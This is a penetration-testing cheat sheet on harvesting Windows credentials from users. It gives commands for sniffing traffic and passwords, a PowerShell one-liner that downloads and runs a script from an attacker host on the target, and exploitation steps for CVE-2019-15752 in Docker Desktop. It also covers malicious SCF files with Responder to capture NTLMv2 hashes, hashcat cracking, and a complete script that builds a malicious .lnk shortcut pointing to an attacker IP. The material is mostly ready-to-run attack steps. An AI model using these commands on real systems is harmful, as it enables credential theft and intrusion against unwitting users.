23. Interacting With Users

Traffic Capture

# Wireshark (GUI)
# tcpdump (replace <interface>)
tcpdump -i <interface>
# net-creds (replace <interface> or <pcap_file>)
net-creds -i <interface>
net-creds -f <pcap_file>

Process Command Lines

# PowerShell (on target)
powershell IEX (iwr 'http://10.10.10.205/procmon.ps1')

SCF on File Share

# (Create @Inventory.scf with appropriate content)
# Responder (replace <interface>)
sudo responder -wrf -v -I <interface>

Cracking NTLMv2 Hash

# Hashcat (replace <hash_file> and <wordlist>)
hashcat -m 5600 <hash_file> <wordlist>

Malicious .lnk File (PowerShell)

# (Replace <attackerIP> in the script)
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

1. Traffic Capture

• Wireshark:

  • Utilize Wireshark (if installed) to capture network traffic.

  • Analyze captured traffic for cleartext credentials (e.g., FTP).

• tcpdump/Wireshark (on attack machine):

  • Capture network traffic on the attack machine using tcpdump or Wireshark.

• net-creds:

  • Use net-creds to sniff passwords and hashes from a live interface or pcap file.

2. Process Command Lines

• Monitor process command lines:

  • Use the provided PowerShell script to monitor process command lines for potentially exposed credentials.

• Execute monitoring script on target:

  • Host the script on the attack machine (e.g., http://10.10.10.205/procmon.ps1).

  • Execute on the target using: powershell IEX (iwr 'http://10.10.10.205/procmon.ps1')

3. Vulnerable Services

• CVE-2019-15752 (Docker Desktop):

  • Exploit the vulnerability by placing a malicious executable in C:\PROGRAMDATA\DockerDesktop\version-bin\.

  • Wait for the Docker application to restart or a user to execute docker login.

4. SCF on a File Share

• Create a malicious SCF file (e.g., @Inventory.scf):

  • Use the provided SCF file content, replacing the attacker IP and share details.

• Start Responder:

  • sudo responder -wrf -v -I tun0 (replace tun0 with your interface)

• Wait for user interaction:

  • Monitor Responder for captured NTLMv2 hashes.

5. Cracking NTLMv2 Hash

• Use Hashcat:

  • hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt (replace hash and wordlist path)

6. Capturing Hashes with Malicious .lnk File

• Generate a malicious .lnk file:

  • Use the provided PowerShell script, replacing the attacker IP.

• Place the .lnk file on a share or target machine.

• Start Responder and monitor for captured hashes.